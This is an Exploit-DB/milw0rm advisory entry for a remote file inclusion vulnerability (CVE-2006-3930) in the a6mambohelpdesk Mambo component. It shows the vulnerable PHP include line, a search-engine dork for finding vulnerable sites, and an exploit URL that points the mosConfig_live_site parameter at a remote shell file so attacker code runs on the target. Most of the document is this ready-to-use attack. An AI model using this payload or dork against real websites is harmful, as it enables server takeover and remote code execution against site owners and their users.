a6mambohelpdesk Mambo Component <= 18RC1 Include Vulnerability

2006-07-27T00:00:00
ID EDB-ID:2078
Type exploitdb
Reporter Dr.Jr7
Modified 2006-07-27T00:00:00

Description

a6mambohelpdesk Mambo Component <= 18RC1 Include Vulnerability. CVE-2006-3930. Webapps exploit for php platform

                                        
                                            a6mambohelpdesk Mambo Component &lt;= 18RC1 Remote Include Vulnerability

# Rish : High
# Class : Remote
# Script : a6mambohelpdesk
# Thanx : www.lezr.com/vb

# codes

&lt;?
include("$mosConfig_live_site/components/com_a6mambohelpdesk/about.html" );
?&gt;

# d0rkiz : allinurl:"com_a6mambohelpdesk"

http://www.site.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://shell.txt


# by Dr.Jr7

# milw0rm.com [2006-07-27]